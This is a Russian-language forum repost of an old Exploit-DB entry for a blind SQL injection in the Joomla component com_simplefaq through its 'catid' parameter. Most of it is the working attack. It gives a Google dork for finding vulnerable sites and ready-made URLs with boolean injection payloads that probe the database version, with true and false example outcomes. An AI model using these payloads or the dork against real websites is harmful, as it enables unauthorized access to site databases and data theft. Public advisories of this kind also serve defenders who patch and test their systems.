Exploit Joomla! Component com_simplefaq - 'catid' Blind SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11294
Проверка EDB
  1. Пройдено
Автор
ATT4CKXT3RR0R1ST
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-0632
Дата публикации
2010-01-30
Код:
Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability
=========================================================================

###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Team : Sec Attack Team
.:. Email : [email protected]
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_simplefaq
.:. Script Download: http://www.parkviewconsultants.com/component/option,com_mosipn/page,free/
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_simplefaq"
#############################################

===[ Exploit ]===

www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70[Blind Injection]&page=1#FAQ5

www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True

www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False


===[ Example ]===

http://server/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True

http://server/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False

#############################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
 
Источник
www.exploit-db.com

Похожие темы